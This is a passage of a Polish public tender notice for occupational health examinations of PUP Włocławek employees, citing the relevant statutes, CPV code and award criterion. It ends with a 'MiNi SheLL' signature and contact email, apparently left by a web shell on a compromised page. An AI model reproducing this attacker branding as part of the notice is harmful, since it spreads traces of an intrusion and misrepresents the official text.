c)	kontrolne przy pracy z komputerem oraz bez komputera.
2. Pracowników PUP Włocławek zajmujących stanowiska kierownicze skierowanych na badania:
a) wstępne przy pracy z komputerem oraz bez komputera,
b) okresowe przy pracy z komputerem oraz bez komputera,
c) kontrolne przy pracy z komputerem oraz bez komputera.
3. Pracowników PUP Włocławek zajmujących stanowisko kierowcy skierowanych na badania:
a) wstępne,
b) okresowe,
c) kontrolne.
4. Pracowników niepełnosprawnych PUP Włocławek zaliczonych do znacznego bądź umiarkowanego stopnia niepełnosprawności w celu korzystania ze skróconej normy czasu pracy.

Wykonawca zobowiązany jest przeprowadzać badania lekarskie w szczególność zgodnie z ustawą 
z dnia 27 czerwca 1997 r. o służbie medycyny pracy (Dz. U. z 2004 r. Nr 125 poz. 1317                z późn. zm.), ustawą z dnia 15 kwietnia 2011 r. o działalności leczniczej (Dz. U. z 2011 r. Nr 112 poz. 654 z poźn. zm.) oraz Rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 r. w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy (Dz. U z 1996 r. Nr 69 poz. 1586), a także z art. 15 ustawy z dnia 27 sierpnia     1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych (Dz. U. z 2011 r. nr 127 poz. 721), a także innymi aktualnie obowiązującymi w tym zakresie przepisami prawa.


Pozostała część opisu przedmiotu zamówienia znajduje się w Specyfikacji istotnych warunków zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.10.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com